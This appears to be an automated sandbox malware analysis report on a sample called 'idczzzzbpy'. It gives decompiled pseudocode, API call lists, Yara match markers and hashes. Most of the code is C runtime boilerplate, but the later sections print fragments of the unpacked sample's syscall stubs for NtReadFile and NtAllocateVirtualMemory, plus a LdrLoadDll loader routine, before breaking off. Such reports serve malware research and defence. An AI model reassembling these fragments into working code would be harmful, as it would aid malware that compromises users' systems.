                    							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                    							_t37 = _t154 + 0xc; // 0xd
                    							E003B40A2(_t37, 0xfa0, 0);
                    							_t156 = _t156 + 0xc;
                    							_t38 = _t154 + 8;
                    							 *_t38 =  *(_t154 + 8) + 1;
                    							__eflags =  *_t38;
                    							_t139 =  *(_t155 - 0x20);
                    							L21:
                    							_t135 =  *(_t155 - 0x1c);
                    							goto L22;
                    						}
                    						_t119 = GetFileType(_t150);
                    						_t139 =  *(_t155 - 0x20);
                    						__eflags = _t119;
                    						if(_t119 == 0) {
                    							goto L21;
                    						}
                    						goto L20;
                    					}
                    					goto L28;
                    				}
                    				_t86 = E003B2600(_t155, 0x3c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                    				goto L49;
                    			}































                    APIs
                    • __lock.LIBCMT ref: 003B38B6
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __calloc_crt.LIBCMT ref: 003B38C7
                      • Part of subcall function 003B4869: __calloc_impl.LIBCMT ref: 003B4878
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003B38E2
                    • GetStartupInfoW.KERNEL32(?,003C2260,00000064,003B1654,003C2190,00000014), ref: 003B393B
                    • __calloc_crt.LIBCMT ref: 003B3986
                    • GetFileType.KERNEL32(00000001), ref: 003B39CF
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2772871689-0
                    • Opcode ID: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction ID: 3f432dc743191298f6bc49eb10788041ca3d1bf5f50f8f544279b781cd6c1c76
                    • Opcode Fuzzy Hash: f650a6e1e4164bdb1b97cae910cdb6e6b535979b9fa428d921f05ac310dc86b4
                    • Instruction Fuzzy Hash: 49810671D043658FCB12CF68C8406E9BBF4AF05328F24426DD6A6EBBD1D7349A02CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E003B3815(void* __ebx, void* __edi, void* __eflags) {
                    				void* __esi;
                    				void* _t3;
                    				intOrPtr _t6;
                    				long _t14;
                    				long* _t27;
                    
                    				E003B1890(_t3);
                    				if(E003B4560() != 0) {
                    					_t6 = E003B4001(E003B35A6);
                    					 *0x3c350c = _t6;
                    					__eflags = _t6 - 0xffffffff;
                    					if(_t6 == 0xffffffff) {
                    						goto L1;
                    					} else {
                    						_t27 = E003B4869(1, 0x3bc);
                    						__eflags = _t27;
                    						if(_t27 == 0) {
                    							L6:
                    							E003B388B();
                    							__eflags = 0;
                    							return 0;
                    						} else {
                    							__eflags = E003B405D( *0x3c350c, _t27);
                    							if(__eflags == 0) {
                    								goto L6;
                    							} else {
                    								_push(0);
                    								_push(_t27);
                    								E003B3762(__ebx, __edi, _t27, __eflags);
                    								_t14 = GetCurrentThreadId();
                    								_t27[1] = _t27[1] | 0xffffffff;
                    								 *_t27 = _t14;
                    								__eflags = 1;
                    								return 1;
                    							}
                    						}
                    					}
                    				} else {
                    					L1:
                    					E003B388B();
                    					return 0;
                    				}
                    			}









                    APIs
                    • __init_pointers.LIBCMT ref: 003B3815
                      • Part of subcall function 003B1890: RtlEncodePointer.NTDLL(00000000,?,003B381A,003B163A,003C2190,00000014), ref: 003B1893
                      • Part of subcall function 003B1890: __initp_misc_winsig.LIBCMT ref: 003B18AE
                      • Part of subcall function 003B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003B4117
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003B412B
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003B413E
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003B4151
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003B4164
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003B4177
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003B418A
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003B419D
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003B41B0
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003B41C3
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003B41D6
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003B41E9
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003B41FC
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003B420F
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003B4222
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003B4235
                    • __mtinitlocks.LIBCMT ref: 003B381A
                    • __mtterm.LIBCMT ref: 003B3823
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B447A
                      • Part of subcall function 003B388B: _free.LIBCMT ref: 003B4481
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(XK<,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B44A3
                    • __calloc_crt.LIBCMT ref: 003B3848
                    • __initptd.LIBCMT ref: 003B386A
                    • GetCurrentThreadId.KERNEL32 ref: 003B3871
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 3567560977-0
                    • Opcode ID: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction ID: 1d4322243ea08b2953d89089327b051f506d4e11de0ef82a23df88f6346f6a65
                    • Opcode Fuzzy Hash: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction Fuzzy Hash: B9F0623250962159E23B76797C026DA2684CF0277CF21862EF750DC8D2EF219A414695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E003B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				intOrPtr _v12;
                    				signed int _v20;
                    				signed int _t35;
                    				int _t38;
                    				signed int _t41;
                    				int _t42;
                    				intOrPtr* _t44;
                    				int _t47;
                    				short* _t49;
                    				intOrPtr _t50;
                    				intOrPtr _t54;
                    				int _t55;
                    				signed int _t59;
                    				char* _t62;
                    
                    				_t62 = _a8;
                    				if(_t62 == 0) {
                    					L5:
                    					return 0;
                    				}
                    				_t50 = _a12;
                    				if(_t50 == 0) {
                    					goto L5;
                    				}
                    				if( *_t62 != 0) {
                    					E003B4BFC( &_v20, _a16);
                    					_t35 = _v20;
                    					__eflags =  *(_t35 + 0xa8);
                    					if( *(_t35 + 0xa8) != 0) {
                    						_t38 = E003B917B( *_t62 & 0x000000ff,  &_v20);
                    						__eflags = _t38;
                    						if(_t38 == 0) {
                    							__eflags = _a4;
                    							_t41 = _v20;
                    							_t59 = 1;
                    							_t28 = _t41 + 4; // 0x840ffff8
                    							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                    							__eflags = _t42;
                    							if(_t42 != 0) {
                    								L21:
                    								__eflags = _v8;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									_t31 = _t54 + 0x70;
                    									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                    									__eflags =  *_t31;
                    								}
                    								return _t59;
                    							}
                    							L20:
                    							_t44 = E003B1CC3();
                    							_t59 = _t59 | 0xffffffff;
                    							__eflags = _t59;
                    							 *_t44 = 0x2a;
                    							goto L21;
                    						}
                    						_t59 = _v20;
                    						__eflags =  *(_t59 + 0x74) - 1;
                    						if( *(_t59 + 0x74) <= 1) {
                    							L15:
                    							_t20 = _t59 + 0x74; // 0xe1c11fe1
                    							__eflags = _t50 -  *_t20;
                    							L16:
                    							if(__eflags < 0) {
                    								goto L20;
                    							}
                    							__eflags = _t62[1];
                    							if(_t62[1] == 0) {
                    								goto L20;
                    							}
                    							L18:
                    							_t22 = _t59 + 0x74; // 0xe1c11fe1
                    							_t59 =  *_t22;
                    							goto L21;
                    						}
                    						_t12 = _t59 + 0x74; // 0xe1c11fe1
                    						__eflags = _t50 -  *_t12;
                    						if(__eflags < 0) {
                    							goto L16;
                    						}
                    						__eflags = _a4;
                    						_t17 = _t59 + 0x74; // 0xe1c11fe1
                    						_t18 = _t59 + 4; // 0x840ffff8
                    						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                    						_t59 = _v20;
                    						__eflags = _t47;
                    						if(_t47 != 0) {
                    							goto L18;
                    						}
                    						goto L15;
                    					}
                    					_t55 = _a4;
                    					__eflags = _t55;
                    					if(_t55 != 0) {
                    						 *_t55 =  *_t62 & 0x000000ff;
                    					}
                    					_t59 = 1;
                    					goto L21;
                    				}
                    				_t49 = _a4;
                    				if(_t49 != 0) {
                    					 *_t49 = 0;
                    				}
                    				goto L5;
                    			}



















                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B91FC
                    • __isleadbyte_l.LIBCMT ref: 003B922A
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 003B9258
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 003B928E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID: 8a;
                    • API String ID: 3058430110-416603896
                    • Opcode ID: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction ID: f90b010a2e6e9fa2754f3460f5b6640f4af5431d2e26d5b14c80d42e11a85a22
                    • Opcode Fuzzy Hash: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction Fuzzy Hash: 6A31C331A0024ABFDB238F69CC44BEA7BA9FF41318F16492AE7158B990D731D850DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E003B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                    				void* _t7;
                    				void* _t8;
                    				intOrPtr* _t9;
                    				intOrPtr* _t12;
                    				void* _t20;
                    				long _t31;
                    
                    				if(_a4 != 0) {
                    					_t31 = _a8;
                    					if(_t31 != 0) {
                    						_push(__ebx);
                    						while(_t31 <= 0xffffffe0) {
                    							if(_t31 == 0) {
                    								_t31 = _t31 + 1;
                    							}
                    							_t7 = HeapReAlloc( *0x3c4834, 0, _a4, _t31);
                    							_t20 = _t7;
                    							if(_t20 != 0) {
                    								L17:
                    								_t8 = _t20;
                    							} else {
                    								if( *0x3c4830 == _t7) {
                    									_t9 = E003B1CC3();
                    									 *_t9 = E003B1CD6(GetLastError());
                    									goto L17;
                    								} else {
                    									if(E003B1741(_t7, _t31) == 0) {
                    										_t12 = E003B1CC3();
                    										 *_t12 = E003B1CD6(GetLastError());
                    										L12:
                    										_t8 = 0;
                    									} else {
                    										continue;
                    									}
                    								}
                    							}
                    							goto L14;
                    						}
                    						E003B1741(_t6, _t31);
                    						 *((intOrPtr*)(E003B1CC3())) = 0xc;
                    						goto L12;
                    					} else {
                    						E003B4831(_a4);
                    						_t8 = 0;
                    					}
                    					L14:
                    					return _t8;
                    				} else {
                    					return E003B114B(__ebx, __edx, __edi, _a8);
                    				}
                    			}










                    APIs
                    • _malloc.LIBCMT ref: 003B745E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: RtlAllocateHeap.NTDLL(00870000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                    • _free.LIBCMT ref: 003B7471
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction ID: d400fa7217a6813c91135100b6f64ce9b3d2cad94987be52578c38d940adbfbc
                    • Opcode Fuzzy Hash: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction Fuzzy Hash: 5511E33280D615ABCB233F76AC55AE93FDCEF4036DF214525FB499EE50DA7089408690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E003B8BC0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				void* _t4;
                    				void* _t15;
                    				void* _t17;
                    
                    				_push(8);
                    				_push(0x3c24b0);
                    				_t4 = E003B2400(__ebx, __edi, __esi);
                    				_t17 =  *0x3c3d3c - 0x3c3d40; // 0x3c3d40
                    				if(_t17 != 0) {
                    					E003B442F(0xc);
                    					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
                    					 *0x3c3d3c = E003B73D6("@=<", 0x3c3d40);
                    					 *(_t15 - 4) = 0xfffffffe;
                    					_t4 = E003B8C09();
                    				}
                    				return E003B2445(_t4);
                    			}







                    APIs
                    • __lock.LIBCMT ref: 003B8BDB
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003B8BEB
                      • Part of subcall function 003B73D6: ___addlocaleref.LIBCMT ref: 003B73F2
                      • Part of subcall function 003B73D6: ___removelocaleref.LIBCMT ref: 003B73FD
                      • Part of subcall function 003B73D6: ___freetlocinfo.LIBCMT ref: 003B7411
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                    • String ID: @=<$@=<
                    • API String ID: 547918592-522152547
                    • Opcode ID: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction ID: a5f234f2f53e71cc729f41302692f6212e64a8ca5f508f7b5c9ebec28bc15cbb
                    • Opcode Fuzzy Hash: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction Fuzzy Hash: EBE08661481300D6D65377617807FCDA6749B0072AF10D10AF2159E9C1CEB45E408B66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E003BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				intOrPtr _t25;
                    				void* _t26;
                    
                    				_t25 = _a16;
                    				if(_t25 == 0x65 || _t25 == 0x45) {
                    					_t26 = E003BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    					goto L9;
                    				} else {
                    					_t34 = _t25 - 0x66;
                    					if(_t25 != 0x66) {
                    						__eflags = _t25 - 0x61;
                    						if(_t25 == 0x61) {
                    							L7:
                    							_t26 = E003BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                    						} else {
                    							__eflags = _t25 - 0x41;
                    							if(__eflags == 0) {
                    								goto L7;
                    							} else {
                    								_t26 = E003BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    							}
                    						}
                    						L9:
                    						return _t26;
                    					} else {
                    						return E003BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                    					}
                    				}
                    			}






                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 791246b61bd22ebdfa6a228266e53b4722b2487872a4a3b9bbf5b3af0b705a21
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0E013972044A4EBBCF135E84CC418EE3F66BB19358B5A8515FB1958831D736C9B1BB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:3.3%
                    Dynamic/Decrypted Code Coverage:2.7%
                    Signature Coverage:5.7%
                    Total number of Nodes:562
                    Total number of Limit Nodes:71

                    Control-flow Graph

                    C-Code - Quality: 31%
                    			E0041A45A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				signed int _v117;
                    				intOrPtr* __esi;
                    				void* _t27;
                    				void* _t36;
                    				void* _t37;
                    				intOrPtr* _t38;
                    				void* _t40;
                    
                    				if(__eax !=  *((intOrPtr*)(__eax + 0x66))) {
                    					_t22 = _a4;
                    					_t38 = _a4 + 0xc48;
                    					E0041AF60(_t36, _t22, _t38,  *((intOrPtr*)(_t22 + 0x10)), 0, 0x2a);
                    					_t5 =  &_a40; // 0x414a31
                    					_t7 =  &_a32; // 0x414d72
                    					_t13 =  &_a8; // 0x414d72
                    					_t27 =  *((intOrPtr*)( *_t38))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, _t37, _t40); // executed
                    					return _t27;
                    				} else {
                    					_v117 =  !_v117;
                    					__ebp = __esp;
                    					__eax = _a4;
                    					_t17 = __eax + 0x10; // 0x300
                    					_t18 = __eax + 0xc4c; // 0x40a93f
                    					__esi = _t18;
                    					E0041AF60(__edi, _a4, __esi,  *_t17, 0, 0x2b) =  *__esi;
                    					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
                    					_pop(__esi);
                    					__ebp = __esi;
                    					return  *__esi;
                    				}
                    			}











                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: 8876a3ec1277deb47a7b7d63f11212dedcb0330a4eb7a845683de2f60b355a70
                    • Instruction ID: 0a5dfef0a32a943c0cbb71fd4efb581bb3984a664a9ef13d40aac49e5e2b3856
                    • Opcode Fuzzy Hash: 8876a3ec1277deb47a7b7d63f11212dedcb0330a4eb7a845683de2f60b355a70
                    • Instruction Fuzzy Hash: 771109B2200208AFCB14DF99DC85EEB77A9EF8C764F158659FA1D97241C634E911CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 8 41a410-41a459 call 41af60 NtReadFile
                    C-Code - Quality: 37%
                    			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				void* _t18;
                    				void* _t27;
                    				intOrPtr* _t28;
                    
                    				_t13 = _a4;
                    				_t28 = _a4 + 0xc48;
                    				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                    				_t4 =  &_a40; // 0x414a31
                    				_t6 =  &_a32; // 0x414d72
                    				_t12 =  &_a8; // 0x414d72
                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                    				return _t18;
                    			}







                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 232 41a53a-41a53b 233 41a506-41a539 call 41af60 call 16a98f0 232->233 234 41a53d-41a556 232->234 235 41a55c-41a57d NtAllocateVirtualMemory 234->235 236 41a557 call 41af60 234->236 236->235
                    C-Code - Quality: 50%
                    			E0041A53A(void* __eax, void* __eflags) {
                    				void* __esi;
                    				void* _t21;
                    				void* _t27;
                    				void* _t28;
                    				intOrPtr* _t29;
                    				void* _t31;
                    
                    				_pop(_t31);
                    				if(__eflags > 0) {
                    					_t29 = __eax + 0xc5c;
                    					E0041AF60(_t27, __eax, _t29,  *((intOrPtr*)(__eax + 0x10)), 0, 0x2f);
                    					_t21 =  *((intOrPtr*)( *_t29))( *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18)),  *((intOrPtr*)(_t31 + 0x1c)), _t28); // executed
                    					return _t21;
                    				} else {
                    					__eflags = __eax;
                    					__ebp = __esp;
                    					__eax =  *(__ebp + 8);
                    					_t10 = __eax + 0xc60; // 0xca0
                    					__esi = _t10;
                    					 *(__ebp + 0x1c) =  *(__ebp + 0x10);
                    					__eax = NtAllocateVirtualMemory( *(__ebp + 0xc),  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp + 0x18),  *(__ebp + 0x1c),  *(__ebp + 0x20)); // executed
                    					__esi = __esi;
                    					__ebp = __ebp;
                    					return __eax;
                    				}
                    			}










                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: db9f86a093b4da20f97a9242ba39c5fafcae6d1b63f48eb8d3bcbec8101a7816
                    • Instruction ID: 21307fda9ad7a26ef85617c9d29a718da9cb2769e425a7457b0e62520968388f
                    • Opcode Fuzzy Hash: db9f86a093b4da20f97a9242ba39c5fafcae6d1b63f48eb8d3bcbec8101a7816
                    • Instruction Fuzzy Hash: C41157B2200208AFDB18DF88DC85EEB77ADEF8C754F148559BA1D97241C634E821CBB4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 256 40acf0-40ad0c 257 40ad14-40ad19 256->257 258 40ad0f call 41cc50 256->258 259 40ad1b-40ad1e 257->259 260 40ad1f-40ad2d call 41d070 257->260 258->257 263 40ad3d-40ad4e call 41b4a0 260->263 264 40ad2f-40ad3a call 41d2f0 260->264 269 40ad50-40ad64 LdrLoadDll 263->269 270 40ad67-40ad6a 263->270 264->263 269->270
                    C-Code - Quality: 100%
                    			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                    				char* _v8;
                    				struct _EXCEPTION_RECORD _v12;
                    				struct _OBJDIR_INFORMATION _v16;
                    				char _v536;
                    				void* _t15;
                    				struct _OBJDIR_INFORMATION _t17;
                    				struct _OBJDIR_INFORMATION _t18;
                    				void* _t30;
                    				void* _t31;
                    				void* _t32;
                    
                    				_v8 =  &_v536;
                    				_t15 = E0041CC50( &_v12, 0x104, _a8);
                    				_t31 = _t30 + 0xc;
                    				if(_t15 != 0) {
                    					_t17 = E0041D070(__eflags, _v8);
                    					_t32 = _t31 + 4;
                    					__eflags = _t17;
                    					if(_t17 != 0) {
                    						E0041D2F0( &_v12, 0);
                    						_t32 = _t32 + 8;
                    					}
                    					_t18 = E0041B4A0(_v8);
                    					_v16 = _t18;
                    					__eflags = _t18;
                    					if(_t18 == 0) {
